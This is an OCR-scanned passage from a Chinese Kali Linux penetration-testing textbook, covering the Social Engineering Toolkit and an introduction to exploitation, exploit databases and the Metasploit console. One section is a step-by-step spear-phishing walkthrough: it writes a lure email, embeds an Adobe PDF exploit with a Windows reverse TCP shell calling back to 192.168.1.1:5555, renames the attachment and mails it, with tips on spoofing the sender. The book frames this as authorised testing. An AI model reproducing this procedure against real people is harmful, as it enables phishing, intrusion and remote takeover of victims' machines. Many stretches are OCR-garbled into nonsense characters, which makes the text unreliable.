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面 期 间 的 攀谈 ，Bob 目 然而 然 地 获取 到 ABC 公 司 有 用 的 财务 和 市 场 策略 
信息 。 请 记 住 ， 达 成 的 关系 越 有 效 ， 越 信任 ， 束 越 有 利于 社会 工程 学 
工程 师 达 到 目标 。 在 信息 安全 方面 还 有 很 多 简化 这 些 操作 的 工具 。 下 
一 小 节 将 会 介绍 的 SET 工 具 整 是 典型 的 社会 工程 学 工具 。 


8.6 Social Engineering Toolkit (SET) 


Social Engineering Toolkit (SET) 是 一 款 先 进 的 多 功能 的 社会 工程 
学 计算 机 辅助 工具 集 。 它 由 TrustedSec (https://www.trustedsec.com) 的 
创始 人 编写 ， 可 以 行 之 有 效 地 利用 客户 端 应 用 程序 的 漏洞 获取 目标 的 
PLA (例如 E-mail 密码 ) 。SET 可 实现 多 种 非常 有 效 且 实用 的 攻击 方 
法 。 其 中 ， 人 们 常用 的 方法 有 : 用 恶意 附件 对 目标 进行 E-mail 钓 鱼 攻 
iti ^ Java applet 攻击 、 基 于 浏览 器 的 漏洞 攻击 、 收 集 网 站 认证 信息 、 建 
立 感染 的 便携 媒体 (USB/DVD/CD) 、 邮 件 群 发 攻击 及 其 他 类 似 攻 
击 。 它 是 实现 这 些 攻击 方法 的 合成 攻击 平台 。 充 分 利用 这 个 程序 的 极 
具 说 服 力 的 技术 ， 可 对 人 的 因素 进行 深入 测试 。 

如 需 启 动 SET， 可 在 桌面 业 单 中 依次 选中 Applications | Kali Linux | 
Exploitation Tools | Social Engineering Toolkit | setoolkit ° 

或 者 在 终端 中 加 载 SET 程 序 。 

root@kali: ~# setoolkit 

上 述 指 令 将 显示 如 下 选项 〈 见 图 8.1) 。 

本 例 将 演示 通过 恶意 PDF 附件 发 起 钓鱼 攻击 的 方法 。 在 收 件 人 打开 
附件 时 ， 他 们 的 主机 将 被 攻陷 o 

不 要 使 用 SET 工具 集 自 融 的 更 新 功能 更 新 SET 程序 包 。 您 应 该 使 用 
Kali Linux 系统 的 更 新 功能 ， 以 获取 SET 软件 的 更 新 。 


eated by: David Kennedy 
Version: 4.7.2 


The Social-Engineer Toolkit is a product of TrustedSec. 
Visit: 
Select from the menu: 


1) Social-Engineering Attacks 

2) Fast-Track Penetration Testing 

3) Third Party Modules 

4) Update the Metasploit Framework 

5) Update the Social-Engineer Toolkit 
6) Update SET configuration 

7) Help, Credits, and About 


99) Exit the Social-Engineer Toolkit 


set» 1 


图 8.1 

如 有 果 采 用 这 种 攻击 方法 ， 我 们 就 要 首先 创建 一 个 配合 恶意 PDF 附件 
的 E-mail 模 板 ， 再 选择 适当 的 PDF exploit payload， 然 后 设置 攻击 平台 
与 目标 主机 之 间 的 连接 天 系 ， 最 后 通过 Gmail 同 目标 发 送 这 封 E-mail 。 
需要 注意 的 是 ， 您 可 以 通过 Kali Linux 自 带 的 sendmail 程 序 伪造 原始 发 
fF A Bj E-mail 地 址 和 IP 地 址 。 Sendmail 的 配置 文件 
是 /usr/share/set/config/set_config。 有 关 程 序 的 详细 信息 ， 请 参考 Social 
Engineer Toolkit ( SET ) 的 官方 说 明 : http://www.social- 


engineer.org/framework/Social Engineering Framework ° 


这 种 攻击 方法 的 具体 步 又 如 下 。 


1. 在 SET 程序 的 最 初 表单 里 选择 1， 进 入 图 8.2 所 示 的 设置 界面 。 

2. 我 们 选择 1， 即 Spear-fishing Attack Vectors， 然 后 进入 图 8.3 所 示 
的 设置 界面 。 

3. 在 上 述 选 项 中 ， 我 们 必须 选择 3， 创 建 社会 工程 学 邮件 的 模板 。 
然后 ， 我 们 书写 邮件 正文 ， 如 图 8.4 所 示 。 


Select from the menu: 


Spear-Phishing Attack Vectors 
Website Attack Vectors 
Infectious Media Generator 
Create a Payload and Listener 
Mass Mailer Attack 
Arduino-Based Attack Vector 
SMS Spoofing Attack Vector 


Wireless Access Point Attack Vector 
QRCode Generator Attack Vector 
Powershell Attack Vectors 

Third Party Modules 


Return back to the main menu. 


sot» 1 


The Spearphishing module allows you to specially craft email messages and send 
them to a large (or small) number of people with attached fileformat malicious 
payloads. If you want to spoof your email address, be sure "Sendmail" is in- 
stalled (apt-get install sendmail) and change the config/set config SENDMAIL-O 
F 
flag to SENDMAIL-ON. 


There are two options, one is getting your feet wet and letting SET do 
everything for you (option 1), the second is to create your own FileFormat 
payload and use it in your own attack. Either way, good luck and enjoy! 


1) Perform a Mass Email Attack 
2) Create a FileFormat Payload 
3) Create a Social-Engineering Template 


99) Return to Main Menu 


set :phishing»li 


图 8.3 


set :phishing>3 
[****] Custom Template Generator [****] 


Always looking for new templates! In the set/src/templates directory send an ema 
il 
to davek@secmaniac.com if you got a good template! 
set» Enter the name of the author: Steven 
Bet» Enter the subject of the email: XYZ Inc Business Report 
rol«c when finished: : Dear User,e, hit return for a new line. Contr 
ext line of the body: Please find the attached document for XYZ Company 
ext line of the body: Regards, 
ext line of the body: Steven 
ext line of the body: 


图 8.4 
4. 虽然 我 们 在 上 一 步 里 写 好 了 邮件 的 正文 ， 但 是 并 没有 设置 邮件 
的 格式 。 BUR E BUEST ZUG RIN SERB CREARE ERN 
模板 。 在 编辑 完 正 文 之 后 ， 使 用 Ctrl+C 键 返回 上 级 菜单 。 然 后 ， 进 行 E- 
mail 攻 击 的 有 关 设 置 。 我 们 从 Perform a Mass Email Attack 荣 单 里 选择 
#49676, EN Adobe CoolType SING Table*uniqueName"Overflow 3 
如 图 8.5 所 示 。 


set :phishing»l 


Select the file format exploit you want. 
The default is the PDF embedded EXE. 


Moo OE fe oe PAYLOADS OOK OR OK KOK ot 


1) SET Custom Written DLL Hijacking Attack Vector (RAR, ZIP) 
2) SET Custom Written Document UNC LM SMB Capture Attack 
3) Microsoft Windows CreateSizedDIBSECTION Stack Buffer Overflow 
4) Microsoft Word RIF pFragments Stack Buffer Overflow (MS10-087) 
5) Adobe Flash Player "Button" Remote Code Execution 
6) Adobe CoolType SING Table "uniqueName" Overflow 
7) Adobe Flash Player "newfunction" Invalid Pointer Use 
8) Adobe Collab.collectEmailInfo Buffer Overflow 
9) Adobe Collab.getIcon Buffer Overflow 
10) Adobe JBIG2Decode Memory Corruption Exploit 
11) Adobe PDF Embedded EXE Social Engineering 
12) Adobe util.printf() Buffer Overflow 
13) Custom EXE to VBA (sent via RAR) (RAR required) 
14) Adobe U3D CLODProgressiveMeshDeclaration Array Overrun 
15) Adobe PDF Embedded EXE Social Engineering (NOJS) 
16) Foxit PDF Reader v4.1.1 Title Stack Buffer Overflow 
17) Apple QuickTime PICT PnSize Buffer Overflow 
18) Nuance PDF Reader v6.0 Launch Stack Buffer Overflow 
19) Adobe Reader u3D Memory Corruption Vulnerability 
20) MSCOMCTL ActiveX Buffer Overflow (ms12-027) 


bet :payloads»li 


图 8.5 

5. 接 下 来 设置 payload 类 型 。 本 例 应 该 选择 6， 即 Windows reverse 
TCP shell。 然 后 设置 目标 主机 应 当 连 接 到 的 攻击 平台 (通常 是 Kali 
Linux 主机 ) 的 IP 和 端口 。 本 例假 设 攻击 平台 的 IP 地 址 是 192.168.1.1， 
服务 端口 是 5555。 我 们 进行 相应 设置 ， 如 图 8.6 所 示 。 

6. 然后 我 们 更 改 文件 名 ， 以 使 文件 名 称 引 人 人 注目。 我 们 把 payload 
的 文件 名 改 成 了 BizRep2010.pdf。 然 后 ， 我 们 要 让 SET 知道 它 要 如 何 处 
理 我 们 的 payload。 我 们 选择 1， 辣 单个 E-mail 地 址 发 送 payload; 然后 
再 选择 1， 使 用 先前 编辑 好 的 邮件 模板 。 现 在 ， 您 的 屏幕 大 体会 是 图 
8.7 所 示 的 这 种 情况 。 


isset :payloads»l 
set» IP address for the payload listener: 192.168.1.1 


set:payloads» Port to connect back on [443] :5555 

[-] Generating fileformat exploit... 

[*] Payload creation complete. 

[*] All payloads get sent to the /root/.set/template.pdf directory 

[-] As an added bonus, use the file-format creator in SET to create your attachment. 


Right now the attachment will be imported with filename of 'template.whatever' 
Do you want to rename the file? 
example Enter the new filename: moo.pdf 


1. Keep the filename, I don't care. 
2. Rename the file, I want to be cool. 


set :phishing 


图 8.6 


What do you want to do: 


1. E-Mail Attack Single Email Address 
2. E-Mail Attack Mass Mailer 


99. Return to main menu. 
set :phishing»l 


Do you want to use a predefined template or craft 
a one time email template. 


l. Pre-Defined Template 
2. One-Time Use Email Template 


set :phishing»l 

[-] Available templates: 

1: WOAAAA 5111111!!! This is crazy. 
2: Order Confirmation 

3: New Update 

4: Status Report 

5: How long has it been? 

6: Computer Issue 

7: Baby Pics 

8: Have you seen this? 

9: Strange internet usage from your computer 


10: Dan Brown's Angels & Demons 
11: XYZ Inc Business Report 
set :phishing»Bi 


图 8.7 
7. 接 下 来 ， 我 们 选择 先前 创建 的 E-mail 模板 (11) 。 这 样 ，SET 
将 在 后 续 的 社会 工程 学 攻击 里 重复 利用 这 个 模板 。 您 创建 的 模板 的 质 
量 ， 很 大 程度 上 决定 了 钓鱼 战役 的 实际 效果 。 然 后 ， 我 们 使 用 有 效 的 
E-mail 中 转 服务 器 或 Gmail 账户 向 目标 人 员 发 送 攻 击 性 E-mail 。 


只 有 在 测试 条 款 里 存在 相应 测试 内 容 且 客户 明确 理解 测试 内 容 的 
情况 下 ， 您 才 可 以 进行 这 种 攻击 测试 。SET 工 具 把 感染 文件 发 送 给 E- 
mail 收 件 人 ， 这 种 行为 可 能 会 引发 法 律 问题 。 您 需要 参照 发 起 测试 地 区 
的 当地 法 律 文 件 了 解 有 关 的 法 律 规 定 。 一 旦 您 在 SET 中 设置 了 E-mail 信 
息 ， 它 就 会 立即 建立 连接 发 送 文件 。 程 序 会 在 没有 任何 警告 或 提示 的 
情况 下 直接 发 送 E-mail 。 

8. 至 此 ， 我 们 已 经 向 目标 发 起 了 攻击 。 现 在 我 们 等 待 受害 人 打开 
我 们 的 恶意 PDF 文件 。 在 他 /她 打开 PDF 附件 的 时 候 ， 我 们 将 通过 反射 
shell 连接 到 被 害 人 电脑 的 shell。 请 注意 ， 我 们 配置 的 IP 地 址 
192.168.1.1 是 攻击 人 员 主 机 的 IP 地 址 (也 就 是 Steven 电 脑 的 IP) ， 它 
在 5555 端 口 受理 被 害 人 电脑 反射 shell 返 回 的 连接 。 

通过 上 述 步 又， 我 们 瓯 完成 了 回 目标 发 起 社会 工程 学 攻击 的 操 
作 ， 并 可 远程 访问 被 害 人 的 主机 。 我 们 可 在 shell 的 交互 式 提示 符 下 执 
行 Windows 命 令 。 

SET 可 同时 对 一 人 或 多 人 进行 电子 邮件 的 钓鱼 攻击 。 它 整合 了 可 
定制 的 E-mail 功能 ， 便 于 社会 工程 学 工程 师 制 定安 全 的 攻击 路 线 。 这 
种 功能 可 在 攻击 多 个 公司 员工 的 同时 保持 攻击 的 隐蔽 性 。 

SET 的 作者 不 断 地 更 新 着 这 个 程序 ， 以 适应 当前 技术 的 剧烈 变 
化 。 不 过 ， 它 的 功能 可 见 一 班 。 本 书 强烈 建议 读者 访问 作者 的 网 站 ， 
继续 领略 SET WM KR 。 它 的 官方 网 站 是 


https://www.trustedsec.com/downloads/social- engineer-toolkit/ ° 


8.7 总 结 


在 本 章 中 ， 我 们 阐述 了 社会 工程 学 在 生活 中 各 领域 的 常见 用 法 。 
渗透 测试 人 员 可 以 根据 实际 情况 采取 相应 的 社会 工程 学 策略 ， 获 取 目 
标的 敏感 信息 。 人 性 本 身 非常 容易 受到 这 种 技术 的 欺 驴 攻击 。 为 了 全 


面 介 绍 社会 工程 学 的 技巧 ， 本 文 讨论 了 构成 人 类 心理 学 模型 的 几 个 因 
素 ， 这 些 因素 包括 沟通 、 环 境 、 知 识 和 沟通 模式 控制 。 这 些 心理 学 原 
则 可 帮助 攻击 人 员 和 根据 说 测 目 标的 实际 情况 ,拟定 适 用 的 攻击 过 程 
(情报 收集 、 确 定 漏洞 点 、 规 划 攻 击 和 执行 攻击 ) 和 攻击 方法 (冒名 
顶 蔡 、 投 桃 报 李 、 狐 假 虎 威 、 唉 以 重 利 和 社会 关系 ) 。 随 后 ， 我 们 演 
示 了 SET 的 使 用 方法 ， 它 具有 在 线 进行 目 动 化 社会 工程 学 攻击 的 强大 
功能 。 


漏洞 利用 是 渗透 测试 的 一 个 环 厅 。 脆 弱 性 评 佑 不 涉及 漏洞 利用 的 
有 关 测 试 。 在 摸索 出 目标 的 漏洞 之 后 ， 测 试 人 员 会 验证 并 真 刀 真 枪 地 
利用 目标 系统 的 安全 漏洞 ， 以 进一步 了 解 目 标 网 络 和 运营 系统 ， 获 取 
更 多 信息 ， 甚 至 掌握 完全 控制 权 。 本 章 讲 重点 介绍 实战 环境 下 使 用 的 
漏洞 利用 工具 ， 并 阐述 漏洞 利用 的 具体 方法 。 

本 章 分 为 以 下 几 个 部 分 。 

9.1 世 介绍 漏洞 检测 的 相关 知识 。 漏 洞 检 测 是 理解 、 检 查 、 测 试 漏 
洞 鸭 基础 工作 ， 十 指导 利用 漏洞 工作 的 重要 环节 。 

9.2 节 介 绍 漏洞 和 漏洞 利用 程序 的 资料 库 (exploit repositories) 
漏洞 利用 程序 的 资料 库 是 查找 公开 获取 exploit 的 重要 途径 ， 它 还 描述 了 
有 天 exploit 的 应 用 方法 。 

9.3 节 从 评估 目标 安全 性 的 角度 ， 讲 解 一 款 恶 名 远扬 的 漏洞 利用 程 
序 工 具 集 及 其 使 用 方法 。 这 部 分 内 容 清晰 地 演示 了 利用 目标 漏洞 到 获 
取 敏 感 信 息 的 各 个 步骤 。 本 市 还 进行 了 细致 的 案例 说 明 。 

本 章 的 最 后 篇 幅 将 简要 地 介绍 编写 Metasploit exploit 模板 的 具体 步 


编写 漏洞 利用 程序 (exploit) 的 程序 代码 都 不 仅 费时 费力 ， 而 且 代 
人 码 的 质量 直接 关系 着 整个 工作 环 世 的 成 败 。 因 此 ， 渗 透 人 员 需 要 根据 
目标 环境 的 实际 情况 对 通过 公开 渠道 获取 的 exploit 程 序 进行 相应 调整 。 
这 种 调整 工作 的 技术 含量 很 高 ， 而 且 这 类 工作 通常 都 吓 触 类 学 通 的 。 
掌握 相应 技能 的 人 员 可 以 举一反三 地 对 很 多 程序 进行 调整 。 强烈 建 议 
读者 在 编写 自己 的 漏洞 利用 程序 之 前 ， 先 通过 公开 渠道 获取 的 的 漏洞 
利用 程序 练 手 。 


9.1 漏洞 检测 


了 解 特定 软件 或 特定 硬件 设备 的 功能 ， 可 能 驳 是 挖掘 其 次 在 漏洞 
的 第 一 步 。 检 验 漏洞 并 不 容易 ， 绝 非 是 一 践 而 就 之 事 。 检 验 人 员 必 须 
具备 扎实 的 知识 基础 ， 了 解 安 全 分 析 的 各 方面 因素 。 漏 洞 检 测 所 需 的 
安全 分 析 技 能 分 为 以 下 几 种 。 

e 编程 技能 ， 这 是 称职 的 守法 黑客 必须 具备 的 基础 素质 。 掌 握 某 种 
编程 语言 的 基本 原理 和 编程 方法 ， 是 安全 测试 人 员 检 测 程序 漏洞 的 必 
备 技能 。 除 此 之 外 ， 他 还 应 当 深 入 了 解 处 理 右 、 系 统 内 存 、 绥 冲 区 、 

BET > 数据 类 型 、 寄 存 器 和 缓存 等 基础 概念 。 无 论 是 CC++、 了 Python、 
Pert 还 是 汇编 语言 ， 几 乎 所 有 编程 语言 的 实现 方式 都 与 上 述 概 含有 关 。 
根据 现 有 漏洞 编写 exploit 程 序 的 基本 方法 ， 请 参阅 http:/www. 


phreedom.org/presentations/exploit-code-development/exploit-code- 


development.pdf ° 

e 挝 问 工 程 : 漏洞 挖掘 工作 同样 依赖 测 坛 人 员 的 了 逆 癌 工程 瓜 能。 这 
种 技术 分 析 程 序 的 具体 函数 、 数 据 结构 和 算法 ， 可 检测 出 电子 设备 、 
软件 以 及 系统 中 潜藏 的 漏洞 。 逆 向 工程 的 反 编 译 技术 ， 可 在 事先 不 知 
道内 部 结构 情况 下 逆向 解析 出 程序 的 源 代 码 ， 从 而 测试 程序 的 错误 条 
件 、 不 完善 的 函数 以 及 存在 缺陷 的 协议 ， 并 能 够 测试 程序 的 边界 条 


件 。 专 业 的 安全 研究 员 都 具备 很 高 的 逆向 工程 实战 能 力 。 逆 向 工程 可 
以 用 于 去 除 软 件 的 版 权 保护 、 安 全 审计 、 分 析 技 术 竞 争 情报 、 侵 权 鉴 
定 、 研 究 软件 的 交互 性 、 掌 握 程 序 的 工作 机 制 ， 甚 至 破获 敏感 数据 。 
逆向 工程 为 应 用 安全 的 概念 增加 了 两 个 抽象 层 ， 源 代码 级 审计 (source 
code auditing) 和 二 进 制 (可 执行 程序 ) 审计 (binary auditing) 。 如 果 
可 以 获取 程序 的 源 代码 ， 审 计 人 员 可 采用 自动 或 手动 的 方式 分 析 源 程 
序 的 安全 问题 ， 进 而 解析 出 可 能 触发 漏洞 的 边界 条 件 。 另 一 方面 ， 虽 
然 测 试 人 员 可 以 在 没有 源码 的 情况 下 进行 二 进 制 审计 ， 不 过 这 种 审计 
的 效果 不 如 源 代 码 审 计 理 想 。 二 进 制 审计 通常 都 会 用 到 两 种 通用 类 型 
的 辅助 工具 ， 即 反 汇 编程 序 (disassemblers) 和 反 编 译 程 序 

(decompilers) 。 反 汇编 程序 可 把 编译 后 的 二 进 制 程序 反 汇 编 成 汇编 
E. ， 而 反 编 译 器 则 把 编译 后 的 二 进 制 程序 反 编 译 成 高 级 程序 语言 的 
程序 源 代 码 。 然 而 ， 无 论 选 用 反 汇 编程 序 还 是 反 编 译 程序 ， 成 功 的 逆 
问安 全 工作 都 离 不 开 审 计 人 员 扎 实 的 技术 实力 和 小 心 谨慎 的 评估 态 
度 o 

e XE LEL: 检测 漏洞 的 工作 依赖 各 种 调试 器 、 数 据 挖掘 器 、 
Ba WU AE Gass SBP Mas > (SE or ras > Tio Tas Al 
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们 同时 还 是 测试 项 目的 集成 测试 平台 。 虽 然 Kali Linux 收 条 了 不 少 监 测 
工具 ， 但 是 本 书 并 不 会 详细 讲解 每 款 工具 。 如 需 持 续 关 注 逆向 工具 的 
最 新 动态 ， 请 访问 在 线 的 网 络 资 料 库 : 
http://www.woodmann.com/collaborative/tools/index.php/Category 
RCE_Tools ° 
e 构建 exzploit 和 payload 的 技术 实力 : 利用 漏洞 的 最 后 一 步 工 序 就 是 

编写 漏洞 的 PoC (Proof of Concept， 概 念 验证 ) 程序 ， 即 shellcode。 这 
种 程序 站 在 使 渗透 测试 人 员 在 远程 目标 主机 上 执行 自 定义 的 指令 。 根 
据 逆向 工程 阶段 掌握 的 应 用 程序 的 具体 缺陷 ， 测 试 人 员 要 编写 验证 漏 


洞 的 点 睛 之 笔 一 -shellcode 程 序 。 同 时 ， 他 们 还 要 防止 shellcode 存 在 缺 
陷 ， 尽 其 所 能 地 避免 exploit (漏洞 利用 程序 ) CSUR Tot] ail o 

要 让 目标 系统 执行 我 们 编写 的 程序 或 我 们 所 要 执行 的 指令 ， 就 应 
当 和 针对 漏洞 的 类 型 和 类 别 拟定 针对 性 的 策略 。 为 了 获取 目标 操作 系统 
的 控制 权 ， 专 业 的 渗透 测试 人 员 会 尽力 挖掘 并 综合 使 用 应 用 程序 的 各 
种 安全 人 缺陷。 本 章 的 后 半 部 分 将 通过 几 个 场景 演示 Metasploit 框 架 的 使 
用 方法 和 相关 技术 。 


9.2 漏洞 和 exploit 资 料 库 


近 些 年 来 ， 公 共 领 域 持续 报道 了 大 量 的 程序 漏洞 。 其 由 一 些 漏洞 
存在 PoC ° PoC 程序 从 一 个 侧面 验证 了 exploit (利用 应 用 程序 漏洞 ) 
的 可 行 性 。 而 且 ， 并 不 是 每 个 被 发 现 的 漏洞 都 会 被 立刻 修补 。 在 当今 
这 个 时 代 里 ， 人 们 争先 恐 后 地 获取 exploit 信 息 和 漏洞 信息 。 渗 透 测 试 人 
员 同 样 可 以 通过 公开 渠道 快速 地 检索 可 适用 于 目标 系统 的 exploit 程 序 。 
如 果 具 备 了 一 定 的 编程 技巧 并 掌握 解 操 作 系 统 的 具体 染 构 ， 您 还 可 以 
将 一 种 类 型 的 exploit 转 换 为 另 一 种 exploit (例如 ， 将 Win32 框 染 的 
exploit 转 换 为 Linux 架 构 的 exploit 程 序 ) 。 本 文 将 介绍 一 系列 的 网 络 资 
料 库 ， 以 助 您 追踪 漏洞 信息 或 查找 适用 的 exploit 程 序 。 

请 注意 : 网 络 上 公开 的 漏洞 信息 并 不 涵盖 全 部 已 知 漏洞 。 此 外 ， 
虽然 部 分 漏洞 存在 对 应 的 PoC exploit 程 序 ， 但 是 并 非 所 有 的 安全 漏洞 信 
奶 都 有 公开 的 PoC 代 码 。 在 公开 的 漏洞 信息 中 ， 部 分 漏洞 的 摘 述 信息 其 
至 可 谓 是 言 之 无 物 。 因 此 ,“ 要 在 研究 漏洞 时 参考 多 个 网 上 资源 ”已 经 
成 为 了 众多 安全 审计 人 员 的 共识 。 


资料 库 名 称 网 址 


Bugtraq SecurityFocus 
OSVDB Vulnerabilities 
Packet Storm 

VUPEN Security 

National Vulnerability Database 
ISS X-Force 

US-CERT Vulnerability Notes 
US-CERT Alerts 

SecuriTeam 

Government Security Org 
Secunia Advisories 

Security Reason 

XSSed XSS-Vulnerabilities 


ttp://www.securityfocus.com 
ttp://osvdb.org 
ttp://www.packetstormsecurity.org 
ttp://www.vupen.com 
ttp://nvd.nist.gov 
ttp://xforce.iss.net 
://www.kb.cert.org/vuls 
ttp://www.us-cert.gov/cas/techalerts/ 
ttp://www.securiteam.com 
ttp://www.governmentsecurity.org 
ttp://secunia.com/advisories/historic/ 
ttp://securityreason.com 
ttp://www.xssed.com 
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Security Vulnerabilities Database http://securityvulns.com 

SEBUG http://www.sebug.net 

BugReport http://www.bugreport.ir 

MediaService Lab http://lab.mediaservice.net 
Intelligent Exploit Aggregation Network http://www.intelligentexploit.com 
HackOwn http://www. hackOwn.com 


本 文 仅 罗 列 了 部 分 网 络 资 源 。Kali Linux $2 Bv, T H1 “Offensive 
Security” 提 供 的 资料 库 ， 可 在 您 的 系统 上 保存 exploit 的 所 有 漏洞 记录 ， 
以 便 您 日 后 参考 和 使 用 。 如 需 查 看 Exploit-DB 提 供 的 资料 ， 可 在 主机 的 
shell 中 执行 下 述 指令 

# cd /usr/share/exploitdb/ 

# vim files.csv 

E ule 48 > Tf 5!) d Exploit-DB 收录 的 所 有 exploit 信 息 ， 即 本 
as bo do 目录 下 的 文件 清单 和 相关 摘 述 。Kali 以 
目标 系统 的 类 型 对 漏洞 进行 分 类 (Window ` Linux ` HP-UX ` Novell ` 
Solaris、BSD、IRIX、TRU64、ASP、PHP 等 ) ， 并 把 各 种 exploit 的 源 
代码 保存 在 相应 的 子 目录 下 。 这 些 文件 多 数 是 C、Perl、Python ^ 
Ruby、PHP 以 及 其 他 一 些 编程 技术 开发 的 exploit 源 代码 。Kali Linux 已 
经 收录 了 执行 exploit 程序 所 需 的 did 和 解释 程序 。 

如 何 从 exploits 信 息 中 提取 特定 信息 

通过 操作 系统 的 Bash 指令 ， 您 可 以 对 文本 文件 的 输 出 内 容 进 
iE. MJ nie At Fz HA HDI searchsploit 指令 ， end cat 


files.csv | cut -d“,”-f3 指 令 检 索 特定 的 exploit。 有 天 shell 指 令 的 基本 用 
法 ， 请 查阅 http://tldp.org/LDP/abs/html/index.html ° 


Kali Linux 预 装 了 几 款 十 分 好 用 的 高 级 漏洞 利用 程序 工具 集 ， 其 中 
LA Metasploit 框架 (http://www.metasploit.com) 。 本 文 将 不 仅 会 详细 
地 介绍 这 款 工具 ， 而 且 还 会 通过 大 量 行 之 有 效 的 应 用 场景 来 演示 它 的 
使 用 方法 ， 以 加 深 读 者 对 渗透 测试 的 认识 。Metasploit 框架 是 由 Ruby 程 
序 语言 编写 的 模板 化 框架 ， 具 有 很 好 的 扩展 性 ， 便 于 渗透 测试 人 员 开 
发 、 使 用 定制 的 工具 模板 。Metasploit 的 框架 可 以 分 为 三 大 类 组 成 部 
ay: 库 、 界 面 和 模板 。 本 文 重点 关注 各 个 界面 和 模板 的 功能 。 界 面 

(控制 台 、CU、Web、GUI) 基本 上 是 调用 功能 模板 〈 漏 洞 利 用 、 有 
AEE O DLE ` WR ` NOP) 的 前 端 UI。Metasploit 杠 以 的 每 
个 模板 都 有 不 同 的 作用 ， 它 们 大 体 可 分 为 下 述 模 块 。 

e exploit (漏洞 利用 程序 模板 ) : 包含 各 种 PoC 验证 程序 ， 用 于 验 
证 利用 特定 漏洞 (exploit) 的 可 行 性 。 

e payload (AWE) : 包含 各 种 恶意 程序 ， 用 于 在 目标 系 
统 上 运行 任意 命令 。 它 可 能 是 exploit 的 一 部 分 ， 也 可 能 是 独立 编译 的 应 
用 程序 。 

e Auxiliaries (辅助 工具 模板 ; : GARIR ` IRIK ` REM 
试 、 指 纹 识 别 和 其 他 类 型 的 安全 评估 程序 。 

e Encoders (编码 工具 模板 ) : 在 渗透 测试 中 ， 这 个 模板 用 来 加 密 
有 效 载 集 ， 以 避免 被 杀毒 软件 、 防 火 墙 ~、IDS/IPS 以 其 他 类 似 的 反 恶 意 
软件 检测 出 来 。 

e NOP ( 空 操作 模板 ) : 这 个 模板 用 于 在 shellcode 中 插入 NOP GL. 
编 指 令 ) 。 虽 然 NOP 不 会 进行 实际 的 操作 ， 但 是 在 构造 shellcode 时 可 以 


用 来 暂时 替代 playload， 形 成 完整 的 shellcode 程 序 。 

为 了 便于 读者 理解 ， 下 文 将 演示 两 个 著名 的 Metasploit 界 面 ， 并 讲 
解 相关 的 指令 行 选项 。 每 个 接口 都 有 各 目的 各 有 长 处 和 短处 。 本 文 强 
烈 建议 读者 习惯 使 用 console 接 口 ， 因 为 它 文 持 该 框架 的 多 数 功能 © 


9.3.1 MSFConsole 


MSFConsole 是 效率 最 高 、 功 能 最 强大 的 高 度 集成 的 端 界面 之 一 。 
它 便于 渗透 测试 人 员 充 分 利用 整个 漏洞 利用 程序 框架 。 如 需 使 用 
msfconsole , FJ Æ 5 [fj € 52 E IKW Ye H Applications | Kali Linux | 
Exploitation Tools | Metasploit | metasploit framework， 或 在 终端 中 执行 下 
述 指令 。 

# msfconsole 

上 述 指 令 将 用 户 带 入 控制 台 类 型 的 人 机 交互 界面 。 如 果 需 要 了 解 
所 有 可 用 的 命令 ， 可 以 输 和 人 下 述 指令 。 

msf > help 

上 述 指 令 将 会 显示 两 类 命令 。 一 类 指令 是 在 整个 框 殿 内 通用 的 向 
规 指令 ， 另 一 类 指令 则 是 面 加 后 台数 据 库 的 专用 指令 。 后 全 数据库 里 
存储 着 评估 参数 和 评估 结果 。 要 想 查 看 某 个 指令 的 选项 说 明 ， 可 以 在 
有 天 指令 的 后 面 添 加 -h 后 级 。 例 如 ， 我 们 可 通过 下 述 指 令 查 看 show 命 
令 的 使 用 说 明 。 


msf > show -h 


[*] Valid parameters for the "show" command are: all, encoders, nos, 
exploits, payloads, auxiliary, plugins, options 

[*] Additional module-specific parameters are: advanced, evasion, 
targets, actions 

上 述 命 令 通 常用 于 显示 某 个 类 型 的 可 用 模板 ， 或 者 显示 所 有 模 
板 。 和 用 的 指令 如 下 所 示 。 


e show auxiliary: 列 出 全 
e show exploits: 
e show payloads: 
个 漏洞 利用 程序 ， 再 使 用 该 命令 
Windows 的 载体 将 显 
e show encoders: 
e show nops: 
e show options: 


e show targets: 


e show advanced: 列 出 所 有 高 级 配置 选项 


部 的 辅助 工具 模板 。 

列 出 框架 下 所 有 的 漏洞 利用 程序 。 
列 出 所 有 平台 下 的 有 效 载 千 。 如 采 已 经 选 
^ LH Sho BUS E ° 
示 与 Windows 相 关 的 漏洞 利用 模板 。 

显示 可 用 的 编码 工具 模板 。 


Ee] 
例如 ， 


显示 所 有 可 用 的 NOP 生成 程序 。 


显示 指定 模板 的 全 部 设置 和 选项 信息 。 
显示 exploit 支持 的 操作 系统 类 型 。 
， 以 便 进 行 微调 。 


我 们 将 最 具 价值 的 几 个 常用 命令 总 结 为 下 迹 表格 “您 可 以 在 


Metasploit 的 控制 台 (console) 中 进行 
分 ， 是 您 来 指定 的 


指 e 
check 


connect ip port 


上 机 练习 。 指 令 中 的 斜体 字 部 


参数 。 


描 xh 
在 不 利用 漏洞 的 前 提 下 ， 检 测 目标 主机 是 否 存在 特定 漏洞 。 不 过 ， 多 数 exploit 不 支持 


该 指 今 ^ 


Netcat 和 Telnet 这 类 连接 工具 的 指令 


exploit 执行 用 户 指定 的 exploit 
run 执行 用 户 指 定 的 auxiliary 
jobs 列 出 当前 运行 的 全 部 后 台 模板 。 用 户 可 通过 有 关 选 项 终止 当前 运行 的 模板 


route add subnet 
netmask sessionid 


info module 
set param value 


setg param value 


的 主机 当 作 跳板 使 用 ， 让 它 转发 本 机 的 网 络 流量 


JERA (session id 指定 的 ) 会 话 连接 到 
显示 指定 模板 Cexploit, auxiliary 等 模板 ) 的 详细 信息 
配置 当前 模板 的 参数 


ut 


设置 整个 框架 的 全 局 参数 ， 这 个 参数 会 对 全 部 exploit 和 auxilary 模板 通用 


unset param 
unsetg param 
sessions 


search string 


是 set 命令 的 取消 命令 。 如 需 清楚 所 有 变量 ， 可 使 用 unset all 指令 
用 于 取消 一 个 或 多 个 全 局 变量 
用 于 显示 〈(-1 选项 )、 切 换 (-i ID 选项 )、 终 止 会 话 (-k ID 选项 ) 


通过 模块 名 和 描述 来 方便 搜索 


use module 


下 一 人 小节 将 详细 讲解 这 
模板 的 具体 功能 


选择 特定 的 渗透 测试 功能 模板 


些 命 令 的 使 用 方法 ， 并 演示 整个 框架 各 个 


9.3.2 MSFCLI 


MSFCLI 和 MSFConsole 相 似 ， 它 们 不 仅 都 采用 了 命令 行 界面 ， 而 
且 都 可 在 所 有 的 线程 中 操作 绝 大 多 数 的 模板 。 然 而 ，MSEFCLI 的 目 动 化 
程度 没有 MSFConsole 高 。 

如 需 启 动 msfcji， 可 在 终端 中 使 用 下 述 指令 。 
